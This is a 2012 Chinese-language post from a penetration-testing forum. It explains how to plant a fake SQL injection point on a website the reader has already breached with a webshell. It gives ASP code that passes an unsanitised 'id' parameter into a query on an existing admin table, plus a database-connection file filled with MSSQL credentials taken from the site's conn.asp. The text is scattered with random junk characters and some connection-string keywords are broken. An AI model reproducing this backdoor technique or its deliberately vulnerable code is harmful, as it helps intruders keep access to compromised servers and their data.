中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵8 g. a. e& I: N2 P. E5 A$ b' j
$ [, s, o. V+ s2 K" f+ z& |
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
5 ~! [0 Q  i; D- @) h  |& ?
( \/ f& i9 `; x. S' O4 U8 w这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
- u6 y$ }. J0 v  L3 \
$ u0 D3 b2 h5 f3 t- Y! O首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
, M; f, \. F- \, D
* y, q6 P" z3 r7 I  u密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表6 O! ]" v1 h) k7 ?/ D9 A6 v

5 o5 n4 V8 R% C7 w' \: h, h& }因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:- `0 k6 O* h  O# s& v
  s( z: C5 a) p5 Q% R1 `
程序代码
# D8 m6 ?5 J2 C( b% m<!--#include file="xx.asp"-->+ p( T4 A! X7 T6 S) d$ a0 i
<%' U! c- p% S( l: x
set rs=server.createobject("ADODB.recordset"); l3 _! P5 o- z* w" G1 A# v/ b
id = request("id")
" T" J" C2 |8 p; f" I3 j  ystrSQL = "select * from admin where id=" & id) H. X; _( Y2 Q& D/ s
rs.open strSQL,conn,1,3* ?6 }2 `$ T/ q8 W
rs.close
5 I. O! y3 F, ^, U+ B0 ]%>
/ |4 p1 ^0 V1 w: u) F0 @. k/ R; b& y
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在4 O) M: A" M% q/ W8 [' b
5 a/ L; {: z+ Z2 V6 s9 P, {
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
1 s2 m: E4 X  _: g, h* |$ n$ N. V! j  d# [6 M% `' i
然后就要构造一个连接数据库的文件了,代码如下:
! O) j/ Q0 `6 ~( C- U程序代码
& @% m9 _/ W; _<%        
2 K' O5 L$ V+ J+ RstrSQLServerName = "000.000.000.000"     '服务器名称或地址
/ [# f1 ^) y: U9 I; A" A& _strSQLDBUserName = "sqlname"         '数据库帐号
2 g( l) ^6 {, z, jstrSQLDBPassword = "sqlpass"         '数据库密码
# G. ], q% o$ e1 AstrSQLDBName = "sqldataname"           '数据库名称
  S: E7 k* q' k) ?Set conn = Server.CreateObject("ADODB.Connection")
4 l, Z! v) M, tstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
- G& F9 b4 y2 W  y' Zconn.open strCon, w% G1 p! h) c
%>
$ F% x- T! p2 T7 C/ @- N) M! o3 J. f$ X; y, H
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,0 D4 y! [5 C( |+ s4 k
5 u: K3 U8 V$ \- y! G. }. P
就这样,正常情况下,就OK了,伪造成功……4 b* e; ?$ ~+ |" n' U# S

, u+ ]9 T: L8 k9 M2 i5 r           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2